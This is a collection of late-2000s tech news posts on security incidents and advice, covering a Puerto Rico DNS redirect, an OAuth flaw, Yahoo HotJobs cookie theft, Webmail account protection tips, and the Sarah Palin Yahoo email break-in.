An attack on the main domain name system registrar in Puerto Rico led to the local Web sites of Google, Microsoft, Yahoo, Coca-Cola, and other big companies being redirected for a few hours on Sunday to sites that were defaced, according to security firm Imperva.
Those sites and others including PayPal, Nike, Dell, and Nokia, were redirected to sites that were black except for messages in hacker lingo saying that the sites had been hacked. However, the sites themselves were not hacked, Amichai Shulman, chief technology officer at Imperva, said on Monday.
A group calling itself the "Peace Crew" claimed that they used a SQL injection attack to break into the Puerto Rico registrar's management system, he said. "We're seeing more and more of these DNS-related attacks and seeing them scale up," he added.
While the sites that visitors were redirected to were obviously not the legitimate sites, DNS redirects could be used to send unsuspecting Web surfers to phishing sites pretending to be banks where they would be prompted to provide sensitive information.
People should use the SSL (Secure Sockets Layer) protocol for encrypting communications with sensitive sites and use anti-phishing technology in the browser that colors part of the URL address bar green or red based on the safety level of the site being visited.
Calls to Gauss Research Lab, the organization that manages Puerto Rico's top-level domain, were not answered late on Monday.
This is the message the hackers left on sites affected by the DNS redirect attack, according to mirrors of the defacements captured by Zone-H.org.
(Credit: Zone-H.org)
A security hole in OAuth, the open-source protocol that acts as a "valet key" for users' log-in information, has led services like Twitter and Yahoo to temporarily pull their support, CNET News has learned.
Some developers were dismayed when Twitter pulled its support for OAuth, which it had only recently started to implement: blogger Jesse Stay wrote in a post about other restrictions to Twitter's developer API that its removal of OAuth is one of a number of recent examples of how the microblogging service has "pulled the rug out from under its developers."
In the interest of online safety, CNET News has chosen not to make the details of the security hole public. Here are the basics: The hole makes it possible for a hacker to use social-engineering tactics to trick users into exposing their data. The OAuth protocol itself requires tweaking to remove the vulnerability, and a source close to OAuth's development team said that there have been no known violations, that it has been aware of it for a few days now, and has been coordinating responses with vendors. A solution should be announced soon.
This is a particularly big deal for Twitter, as OAuth prevents users of a service from having to hand over their passwords to third-party services that use that service's application program interface (API), and Twitter relies heavily on developer-created enhancements to the service from clients like Twhirl and TweetDeck to statistics and analytics applications.
"OAuth is still in beta, for what it's worth," Twitter API lead Alex Payne said in (of course) a Twitter message on Wednesday. "We should have the current issue with it resolved soon."
Eran Hammer-Lahav, the OAuth community coordinator for this specific threat, spoke to CNET News later on Wednesday afternoon. "We have been aware of this threat for about a week now, and we have been coordinating with all known providers to help them understand the threat and deploy whatever mitigating factors they can," Hammer-Lahav said, adding that full details will be made available on the OAuth Web site at midnight Pacific time on Thursday. "There are no known exploits of this, so there are no reported attacks and the providers have either already deployed matters to address this or are doing it right now."
He highlighted Twitter's role in helping to keep things on the down-low at its own expense; when the service disabled OAuth, it did not mention that there was a security hole at its root.
"The community is extremely grateful to Twitter, despite the fact that they have been standing alone in the line of fire and taking the heat for this threat as if it was their own issue," Hammer-Lahav explained. "They basically took the PR hit in order to allow other companies to address it. They were doing it not to protect themselves, but to protect other companies."
Twitter co-founder Biz Stone responded to the threat on the company blog: "We take security seriously and felt the responsible thing to do was temporarily disable OAuth while this matter was sorted out. Yahoo and others made similar decisions," Stone wrote. "The developers working on Twitter projects that are in our beta test group felt this disruption the hardest and their patience is extremely appreciated."
This post was last expanded at 1:36 p.m. PT.
This was originally posted at ZDNet's Between the Lines.
Yahoo said Wednesday that it will make its user logs anonymous within 90 days as it ups the ante on data retention policies.
In a statement, Yahoo said it would also make user data on page views, page clicks, ad views, and ad clicks anonymous as well as its user logs. The only exceptions would be for "fraud, security, and legal obligations."
Clearly, Yahoo, Google, and others are racing to the bottom on data retention policies. In particular, Google and Yahoo have been playing a game of privacy leapfrog.
In September, Google said it would make its user logs anonymous after 9 months, a vast improvement over its previous 18-month policy. Google, which was pressured by regulators, said that 9 months was a good balance between "sometimes conflicting factors like privacy, security, and innovation." In July 2007, Yahoo went with a 13-month purge policy.
Anne Toth, Yahoo's head of privacy, said that 90 days was the minimum time it needed to retain user data for business purposes. Yahoo reached that conclusion after a review of its data policies across the globe and consulting business, engineering, governance, and product teams.
As for the exceptions Yahoo said:
To protect users and our business partners, there will be some specific and limited exceptions to the anonymization policy. In order to fight fraud and preserve system security, Yahoo will retain system specific data in identifiable form for no more than 6 months--but only for this purpose. Yahoo may have to retain data for longer periods to meet other legal obligations.
You know all those hoax e-mails that arrive in your in box saying that you've won a lottery? You don't click on them, obviously, but many people do, enough to prompt Microsoft and Yahoo to form a coalition to warn consumers about the scam.
Microsoft, Yahoo, Western Union, and The African Development Bank are partnering to educate Internet users about the dangers of falling prey to the fake lottery winner e-mails.
In such scams, victims are told that they have won a lottery, often in a foreign country, and are then asked to provide their personal and financial information to claim the winnings. In the current economic downturn, the fear is that desperate people will be more likely to take the bait.
The announcement of the coalition, made at the 6th German Anti Spam Summit in Wiesbaden, Germany, coincided with the release of Microsoft-commissioned research on lottery scams in Europe.
Of 4,930 people surveyed, 113 people reported losing money to an Internet fraudster in the last year. Twenty-seven percent of Internet users surveyed predicted they would become a victim of a lottery scam and more than half said lottery scam e-mails scared them off from buying things online.
Yahoo's HotJobs site is vulnerable to a phishing-based attack that can give an attacker access to a Yahoo member's mail and other personal accounts, British network service firm Netcraft said Monday, and someone has been taking advantage of it.
In phishing, an attacker sends a bogus e-mail masquerading as a legitimate message from a company, in this case Yahoo HotJobs. Clicking on a link that includes specially formatted JavaScript code can cause the Web site to run a program because of a cross-site scripting vulnerability, Netcraft said.
"The script steals the authentication cookies that are sent for the yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," NetCraft said Monday. "Netcraft has informed Yahoo of the latest attack, although at the time of writing, the HotJobs vulnerability and the attacker's cookie harvesting script are both still present."
I'll update this post once Yahoo gets back to me with any comment.
Update 3:44 p.m. PDT: Yahoo acknowledged the vulnerability but said it's fixed now.
"The team was made aware of this particular cross-site scripting issue yesterday morning (Sunday, October 26) and a fix was deployed within a matter of hours. Yahoo appreciates Netcraft's assistance in identifying this issue," the company said in a statement. "As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com."
Yahoo wouldn't comment on how many people might have been affected.
There was an interesting article recently in The New York Times about getting locked out of a Gmail account.
In August, blogger Alan Shimel of StillSecure wrote about his problems regaining access to a Yahoo e-mail account. Suffice it to say that if someone learns your Web mail password, it's a very difficult situation--one that may not end well.
For one thing, the Web mail provider may not know enough about you to determine the true account owner. Worse still, anyone using a free Web mail account from Google (Gmail), Yahoo, or Microsoft (Hotmail) can't expect to talk to a human being to resolve a problem with their account. Talking to person at Google requires a subscription to Google Apps Premier Edition for $50 a year. Microsoft and Yahoo similarly offer telephone support only to "premium" customers.
If you care about a Web mail account, then some homework may be in order.
Alternate e-mail address
One thing Web mail users should have associated with their account is an alternate e-mail address. This is typically optional, but it can be critical, should you get locked out. I think you're safer not using an address from the same provider as your alternate. That is, don't provide a Gmail e-mail address as the alternate for a Gmail account. Too many eggs in one basket.
If you're like me, with no recollection or notes about the alternate e-mail address associated with your Web mail account, here's how to check (after first logging in to your account):
Gmail: Click on the "Settings" link in the top right corner, then go to the "Accounts" tab and click on the link in the "Google Account settings" section.
Classic Hotmail: Click on "Options" in the top right corner, then View and Edit your personal information. Your alternate e-mail address is displayed along with a link to change it.
Classic Yahoo: Click on "Options" in the top right corner, then "Mail Options", then (on the left) click on "Account Information" and re-enter your password. Yahoo will then display "Alternate Email 1" and "Alternate Email 2." Yahoo supports two alternate e-mail addresses, a great safety net, since our e-mail providers change over time.
Secure connections
Gmail, Hotmail, and Yahoo Mail all offer secure connections when you initially log on and enter your password. Hotmail and Yahoo then switch back to unsecured, HTTP, connections. Gmail offers an option to always use a secure HTTPS connection, even when reading and writing e-mail. Highly recommended.
To enable this feature, Gmail users should click on "Settings" in the top-right corner, then on the default "General" tab, scroll to the bottom of the page, and turn on the radio button to "Always use https."
Truthiness
Web mail may be one of those places where little white lies are acceptable. The governor of Alaska, who recently had her Yahoo e-mail exposed to the world, set herself up for failure by truthfully answering some questions.
Every Web mail system asks for personal information as a means of identification, should you lose your password. The problem is that this personal information can also be used by a bad guy to learn your password.
Yahoo and Hotmail limit their secret questions to a handful of preselected questions. The straw that broke the camel's back for the governor of Alaska was the question of where she met her spouse. Being a public figure, it didn't take much guessing for someone to correctly answer this question and fool Yahoo into thinking that person was the governor. There were some other canned questions too, but they were also easy to answer using public information.
Public figure or not, there is no reason to answer Web mail security questions truthfully. After all, who are you really lying to? A potential bad guy trying to learn your password.
So, when asked the name of your favorite teacher, feel free to respond "xyz" or with any random word or sentence that no one will guess. Then, of course, write it down in a safe place. The price for making up random answers is the burden of recovery. This is the eternal relationship between security and convenience. More security always entails less convenience.
Gmail is the most flexible of the major providers. It lets you choose your own secret question, thus giving you a fighting chance of picking a question to which no one else knows the answer. Still, if you have a safe place for storing passwords, a totally random answer can't be guessed.
To review your security question in Gmail, click on the "Settings" link in the top-right corner, then go to the "Accounts" tab, and click on the "Google Account settings" link in the section of the same name. Finally, click on "Change security question." You will have to re-enter your Gmail password.
Users of the classic Hotmail system can review their security question by clicking on "options" in the top-right corner, then clicking on "View and edit your personal information."
Yahoo e-mail users may be in for a surprise. Simply knowing your password is not sufficient to view, let alone change, your security question. As described in How do I update my secret question? Yahoo requires you to "verify the Answer to your current Secret Question in order to update it." I'm screwed.
Does someone already know your password?
If someone learned your Web mail password, would you know? It's one thing to have your e-mail read, but it's another to have it read over and over, day after day, by someone who knows your password and is smart enough not to tip their hat by changing it.
Potentially, there is much that Web mail providers can do to let account owners know that someone else is logging into their account when they're asleep. As far as I can tell, Hotmail and Yahoo mail do absolutely nothing in this regard. Gmail, however, offers an audit trail, if you know where to look.
When Gmail users first log in, they should scroll down to the bottom of the initial page and look for a message such as:
Last account activity: 22 hours ago at IP 66.88.111.222. Details
or
Last account activity: 22 minutes ago on this computer. Details
If you didn't last log in to your Gmail account when the message indicates, then someone knows your password.
Internet Protocol addresses can be linked to both an Internet service provider and a country, for sure, and maybe even to a city within the country. For more on this, see my earlier posting "What does your IP address say about you?"
Clicking on the "Details" link offers a longer history of Gmail account activity and an indication of whether the account is currently logged on at another computer. Letting one person log in to a Gmail account simultaneously from two different computers strikes me as a design mistake. But given that design, Gmail users can log off other computers that are currently logged into the same account. Needless to say, this, too, can alert you that someone knows your password.
Information about the most recent Gmail account activity is presented on the bottom of every Gmail Web page. For more, see Last account activity in the Gmail Help.
Test password recovery
Anyone involved in backing up computer files knows the importance of testing the recovery process, and the same applies with Web mail. The best way to ensure that you can recover or reset your password is to try it.
Yahoo password recovery (thanks to the governor of Alaska, it's now the infamous Yahoo password recovery) starts out by asking for your birthday, country of residence, and postal code. Without this gatekeeper information, knowing the secret question is useless. Even something as simple as your postal code needs to be saved rather than remembered because, as Yahoo points out, it may be from your home, your office, or a prior residence or prior work location.
Hotmail password recovery starts with the option to either "Use my location information and secret answer to verify my identity" or to "Send password reset instructions to me in e-mail." If you go the first route and answer the questions correctly, you get to choose a new password.
The location information is the same as Yahoo's--country, state, and ZIP code. If you go the second route, an e-mail message is sent to the alternate e-mail account with two links, one for confirming the request and resetting the password and another for doing nothing.
Gmail error handling isn't limited to just password recovery; they deal with a whole host of problems accessing your account, including:
I forgot my password
I forgot my username
My account has been compromised
My password doesn't seem to be working
Loading issues
Another error or problem
If you forget a Gmail password, you're taken here where, as with the other two systems, you enter the user ID and get in through a Captcha. At this point, there are no options. Google sends an e-mail to the alternate e-mail address. It doesn't display the entire alternate e-mail address (Hotmail, in contrast, does); just the domain name.
I tested this using a Yahoo.com e-mail address as the alternate to a Gmail account. Word to the wise: don't do this. The message from Gmail was treated as spam by Yahoo. The message includes a link that, when clicked, takes you to a Web page where you can enter a new password.
If you no longer have access to the alternate e-mail address, Google advises you to "...try the 'Forgot your password?' link again after five days. At that point, you'll be able to reset your password by answering the security question you provided when you created your account."
Web mail accounts may start out as toys or curiosities, but for many people, they end up being important. A little homework now may save a ton of grief later.
See a summary of all my Defensive Computing postings.
New security features planned for Zimbra will resolve an issue responsible for passwords being transmitted as clear when accessing Yahoo Mail, a Yahoo spokeswoman said on Tuesday.
"Plain text authentication is an industry-wide challenge that major e-mail clients and providers face when providing the right balance of backward compatibility and security," a Yahoo spokeswoman said in an e-mail statement.
"Zimbra has plans as part of the next beta release to implement additional new security features to provide more secure authentication options. This approach will be in place in the next few weeks well before we launch the service out of beta," the statement said.
A Canadian programmer discovered the problem during a Yahoo University Hack Day at Waterloo University last week.
Passwords used to access Yahoo mail through the Zimbra client are sent over the Internet in clear text, a Canadian programmer says.
Holden Karau stumbled upon this problem while participating in the Yahoo University Hack Day at the University of Waterloo last week.
"The Yahoo imap server's used by the Yahoo Desktop don't support SSL and the password was being transmitted in plain text," Karau wrote in a blog post on Friday.
"What does this mean for you? If you use Zimbra to access your Yahoo mail, you almost certainly need to change your password and stop using Zimbra immediately (especially if you've ever done so over wireless)," he writes.
Not surprisingly, his hack didn't place in the competition. "In retrospect it probably wasn't the best forum to bring up the security defects, but it was the most convenient," Karau says.
He notified Yahoo about the problem during his presentation, but no one seemed concerned, he wrote in a post on Zimbra Forums.
A Zimbra representative wrote in a different post in that forum thread: "This problem has already been addressed in code, and fix is in the next release."
A Yahoo spokeswoman said she would check into the matter.
Sarah Palin
(Credit: Alaska governor's office)A grand jury in Chattanooga, Tenn., investigating who hacked Republican vice presidential candidate Sarah Palin's Yahoo e-mail ended its meeting on Tuesday without indicting a Tennessee lawmaker's son.
Speculation on the Internet has centered on 20-year-old David Kernell, a University of Tennessee student.
On the Internet forum 4Chan.org, where the e-mail break-in was first announced, posts attributed to someone named "Rubico" more or less described how the Yahoo account had been compromised using the password recovery feature. The e-mail address used for Rubico has been linked to Kernell.
Kernell's father, Democratic Tennessee state representative Mike Kernel, further fueled speculation last week when he confirmed his son was the subject of the investigation. On Saturday, investigators searched David Kernell's campus apartment.
Justice Department spokeswoman Laura Sweeney told the
There are mixed reports on Friday whether or not the son of a Tennessee state representative has been contacted by the FBI or Secret Service in connection with Sarah Palin's hacked Yahoo Mail account.
The father, Democratic Rep. Mike Kernell has told Knoxville News Sentinel and The Tennessean that despite a lot of online chatter, no formal contact has been made.
The person who gained access to Palin's e-mail account did so by guessing details of her life, then changed the e-mail password to "popcorn."
Using the online nickname Rubico, someone posted details of the hack to a forum on the 4Chan.org Web site starting on Tuesday. Password-protected zip files containing the contents of the now-deleted e-mail account once belonging to the Republican vice-presidential candidate have also been posted to the forum.
Subsequent posts by Rubico to the /b/ board over the last few days have provided additional insight into how the hack was carried out, although many of the posts have now been deleted.
